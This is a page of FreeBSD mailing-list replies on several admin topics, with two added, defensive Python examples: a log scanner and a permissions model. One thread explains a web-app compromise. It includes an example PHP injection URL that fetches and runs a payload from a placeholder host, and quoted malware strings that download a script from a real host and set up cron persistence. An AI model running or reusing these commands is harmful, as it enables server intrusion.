Re: questions about FreeBSD
2009/8/31 James Phillips anti_spam...@yahoo.ca:

... I have some questions about FreeBSD. The questions I had in mind are:

Such general questions imply homework assignment.

Indeed, I found "General features (at least three)? Firewall, GUI, Networking and so on." quite amusing. I am surprised he didn't include the marking scheme for us and his teacher's email address so that we could save him the bother of handing it in.

Somebody already replied with a link to the Handbook: It mainly covers installing and configuring FreeBSD.

If that were the only response, he probably would have just printed the handbook out and handed it in - given the amount of effort he took to hide the fact that it was a homework question. That said, he *might* actually learn something about FreeBSD, which is probably more than can be said for the rest of his class.
Re: what www perl script is running?
Hi Colin.

I thought I'd just add my tuppence here. Some time ago I suffered a similar exploit, albeit on a Linux box, with Apache and a different PHP web app (Horde if I recall correctly).

There are a number of ways your server could have been compromised via a PHP webapp, and a mailing list probably isn't the best place to give you a tutorial on the likes of cross-site scripting and code injection. What I can do is tell you roughly how my site was infected via a code injection - to give you an idea of how important it is to learn more about it if you are running a webserver (especially one with third party web apps installed).

In my case, I was able to learn quite a bit about how the exploit was performed by looking in my Apache logs. Primarily because the attack exploited an HTTP GET variable, so I could actually grep the name of the script that was downloaded from the logs. Basically all it took was for someone to construct a URL similar to the following*:

    http://www.myserver.com/vulnerable_script.php?unchecked_variable=some_value; exec('wget http://evil.url/virus.pl -O /tmp/virus.pl'); exec('/tmp/virus.pl');

All it needs then is a bit of code on the server side which uses the GET variable verbatim to build a line of code without checking the variable. If the above variable were used in the construction of a line of PHP, in an (extra) unsafe manner, you would end up with several lines of PHP. Clearly building code from a user supplied variable is a very bad idea, and doing so without checking the variable... - however it isn't unheard of in the world of third party web apps (it isn't unheard of in in-house web apps either, however because they are not so widespread there is less chance that the exploit will be found, and probably less to gain from exploiting it).

The attack against your server was almost certainly automated and most likely not even targeted at you. If you check your error logs, you will probably see lots of 'file not found' and similar errors, testing for vulnerabilities in ASP scripts and PHP web apps which you don't have installed - in much the same way that you will have SSH login failures for users who don't exist on your system.

Using an incoming and outgoing firewall is clearly a must on a dedicated web server. Running an outgoing server on your desktop is a bit more complicated as you would probably want to allow certain applications to set up outgoing connections. I don't know how you do this on a FreeBSD system.

However something that no one seems to have mentioned yet is running an application level firewall to protect your web server, this is particularly important if you are running popular third party web applications. Once a flaw has been found in a popular web app, it is very easy for the malware writers to attempt to exploit this on thousands of webservers. A web application firewall, such as Mod_Security for Apache (not sure what is available for lighttpd), will check the traffic to your HTTP server for any irregularities, known exploits and potential exploits.

HTH

Jeremy

* the URL I wrote probably isn't even valid, it is just a demonstration, so just treat it as pseudocode.

2009/8/27 Colin Brace c...@lim.nl:

Colin Brace wrote:

ah, another directory found in /tmp with files written by www called .bash/

Contents here: http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz

Apropos of the contents of the above, a correspondent writes:

[...] running 'strings' on /tmp/owned will show

    HISTFILE=/dev/null
    cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 21 /dev/null
    cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 21 /dev/null
    echo '*/1 * * * * perl /tmp/tmpfile' cron.job
    crontab cron.job
    rm -rf cron.job
    chmod 0100 /tmp/tmpfile 21 /dev/null
    perl /tmp/tmpfile 21 /dev/null

[...]

So this would be the original mischief-maker.

Just out of curiosity, can someone explain to me in basic terms how an intruder exploits a vulnerability such as apparently existed on my system (the RoundCube webmail package was apparently the culprit) to place the binary file owned in /tmp and execute it?

Thanks

- Colin Brace Amsterdam http://lim.nl
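As an added illustration of the log review Jeremy describes above (this is not part of the original thread), the following Python sketch scans Apache access-log lines for GET query strings that carry injected code. The log lines, addresses, host name and indicator list are constructed assumptions modelled on the post's example URL.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Indicator list is an assumption, modelled on the post's example (exec, wget, /tmp).
INDICATORS = {
    "php-exec-call": re.compile(r"\b(exec|system|passthru|shell_exec|popen|eval)\s*\(", re.I),
    "download-tool": re.compile(r"\b(wget|curl|fetch)\b", re.I),
    "tmp-path": re.compile(r"/tmp/"),
    "remote-url-in-query": re.compile(r"\b(?:https?|ftp)://", re.I),
}

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still readable."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value

def scan(lines):
    """Return (client, status, path, indicator names) for suspicious GET queries."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path, _, query = target.partition("?")
        if method != "GET" or not query:
            continue
        decoded = decode(query)
        found = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        if found:
            hits.append((client, int(status), path, found))
    return hits

# Constructed sample lines (documentation addresses, placeholder host evil.example).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Aug/2009:03:12:44 +0200] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Aug/2009:03:13:01 +0200] "GET /vulnerable_script.php?unchecked_variable=1%3Bexec(%27wget%20http%3A%2F%2Fevil.example%2Fx.pl%20-O%20%2Ftmp%2Fx.pl%27)%3B HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.9 - - [27/Aug/2009:03:13:05 +0200] "GET /missing.asp?id=1 HTTP/1.1" 404 209 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves attention first, because it means the requested script exists on the server; the 404 probes are the automated scanning the post mentions. The remote-URL indicator will also match legitimate redirect parameters, so treat it as a lead rather than a verdict.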
Re: rsync or even scp questions....
How, may I ask, does this work?

If you search the bash man file you can find this and lots of other useful constructs, search for 'Parameter Expansion' - I'm not sure how much of this relates to other Bourne Shell derivatives, but I don't imagine it would be difficult to test it out.
Re: Can an Account be Locked out for ssh but allow su?
Personally I prefer AllowUsers, as that denies all users except those specifically allowed. Deny/AllowGroups are useful too.

2008/10/8 Martin McCormick [EMAIL PROTECTED]

Henrik Hudson writes:

Check the sshd_config man page for AllowUsers and DenyUsers directives.

Many thanks. DenyUsers did the trick.
Re: detecting monitor's sync and refresh rate?
I cheated a little and pulled this out of openSUSE 11's monitor database:

    #==
    # [EMAIL PROTECTED]
    #-- --
    LCD:[EMAIL PROTECTED] {
      Option=DPMS
      Hsync=31-60
      Modeline=1024x768 65.0 1024 1048 1184 1344 768 771 777 806 -hsync -vsync
      Vsync=30-60
    }

That should be about right for your 15" LCD monitor if it supports [EMAIL PROTECTED] - quite common for 15" monitors. You'll notice modeline matches the last modeline in your logs. It might not be optimal, but it should work if your monitor is VESA compliant.

Another option, if you have the Windows driver disk, would be to extract the .inf file and get the settings from that.

2008/10/8 Anton Shterenlikht [EMAIL PROTECTED]

On Tue, Oct 07, 2008 at 04:42:07PM -0400, Lowell Gilbert wrote:

Anton Shterenlikht [EMAIL PROTECTED] writes:

I've a monitor (Mobi M15MPC) with no docs. I've searched the net but cannot find any info on sync and refresh rate for it. I've done Xorg -configure, but testing with X -config xorg.conf.new shows screen shifted to the side and very nasty blinking, from which I deduced that perhaps I need to specify correct sync, refresh and mode. Are there any commands to get sync and refresh from the monitor?

If X can't probe the monitor for its settings, I wouldn't trust any other method of probing it either. Not to overlook the obvious: are the settings written on the back of the monitor?

no, nothing there. Can I make anything from this fragment of /var/log/Xorg.0.log:

    (II) intel(0): Printing DDC gathered Modelines:
    (II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1184 768 771 777 806 -hsync -vsync (54.9 kHz)
    (II) intel(0): Modeline 800x600x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz)
    (II) intel(0): Modeline 640x480x0.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz)
    (II) intel(0): Modeline 720x400x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync (31.5 kHz)
    (II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz)

You can always try Google...

so far no luck

thanks
anton

-- Anton Shterenlikht Room 2.6, Queen's Building Mech Eng Dept Bristol University University Walk, Bristol BS8 1TR, UK Tel: +44 (0)117 928 8233 Fax: +44 (0)117 929 4423
Re: thorny (for me) permissions problem
4. however, after upload, the file has the ownership A:B (i.e., owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file.

    -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv

Hi John.

Correct me if I am wrong but permission to delete a file depends on the user's permissions for the containing directory. If B has write permission on the directory then B can delete the file. However you will likely need to use 'rm -f'.

Regards.

Jeremy.

On Tue, Oct 7, 2008 at 1:54 PM, John Almberg [EMAIL PROTECTED] wrote:

The following permissions problem has me stumped:

1. User A uploads a file (using ftp) to the server, into a directory called 'data' owned by user B. Permissions on directory set to allow this, like this:

    drwxrwxr-x 2 user_b user_b 512 Oct 7 08:40 data

2. A cron job, run by user B, then processes the file

3. When the processing is complete, the cron job needs to delete the file from the server

4. however, after upload, the file has the ownership A:B (i.e., owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file.

    -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv

The ftp user can manually change the permissions on the file to -rw-rw-r--, but I do not want to depend on the user remembering to change permissions. If he forgets, the cronjob will process the file over and over again. I need the server to handle this, so it gets done correctly 100% of the time.

B does not have sufficient permissions to delete the file or change its permissions.

The only thing I can think of is to have ANOTHER cron job, run by A, run every few minutes to check for the existence of a file, and change the permissions so B can delete it. But this smells like a kludge to me.

Is there a correct way to handle this? For instance, is there something I can set in A's profile, so when he uploads a file, the group permission is set to rw? That would be a nice clean way to do it, but I can't find anything like that.

Any help, much appreciated.

-- John
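Added example, not from the thread: a small Python model of the standard POSIX unlink rule that the reply above relies on, applied to the 'data' directory and data_file.csv from John's listing. The numeric uids and gids, the extra callers and the group membership of user_a are hypothetical, and ACLs and file flags are not modelled.

```python
import stat

def may_unlink(uid, gids, dir_uid, dir_gid, dir_mode, file_uid):
    """POSIX rule: removing a name needs write+search on the directory.
    The file's own mode bits are not consulted. With the sticky bit set,
    the caller must additionally own the file or the directory."""
    if uid == 0:
        return True
    if uid == dir_uid:
        need = stat.S_IWUSR | stat.S_IXUSR
    elif dir_gid in gids:
        need = stat.S_IWGRP | stat.S_IXGRP
    else:
        need = stat.S_IWOTH | stat.S_IXOTH
    if dir_mode & need != need:
        return False
    if dir_mode & stat.S_ISVTX:
        return uid in (file_uid, dir_uid)
    return True

# Hypothetical numeric ids standing in for the thread's users.
USER_A, USER_B, OTHER_MEMBER, OUTSIDER = 1001, 1002, 1004, 1003
GROUP_B = 1002

def thread_case(dir_mode=0o775):
    """Who may delete data_file.csv (owner user_a, mode 0644) from 'data' (user_b:user_b)?"""
    callers = {
        "user_b": (USER_B, {GROUP_B}),
        "user_a": (USER_A, {1001, GROUP_B}),          # assumed member of group user_b
        "other_member": (OTHER_MEMBER, {1004, GROUP_B}),
        "outsider": (OUTSIDER, {1003}),
    }
    return {name: may_unlink(uid, gids, USER_B, GROUP_B, dir_mode, USER_A)
            for name, (uid, gids) in callers.items()}

if __name__ == "__main__":
    print("drwxrwxr-x:", thread_case(0o775))    # directory as listed in the thread
    print("drwxrwxr-t:", thread_case(0o1775))   # same directory with the sticky bit
    print("drwxr-xr-x:", thread_case(0o755))    # group write removed
```

With the directory as listed (drwxrwxr-x), every member of group user_b can remove any file in it, which is worth knowing when an FTP upload directory is shared; the sticky-bit row shows how that is narrowed to the file's owner and the directory's owner.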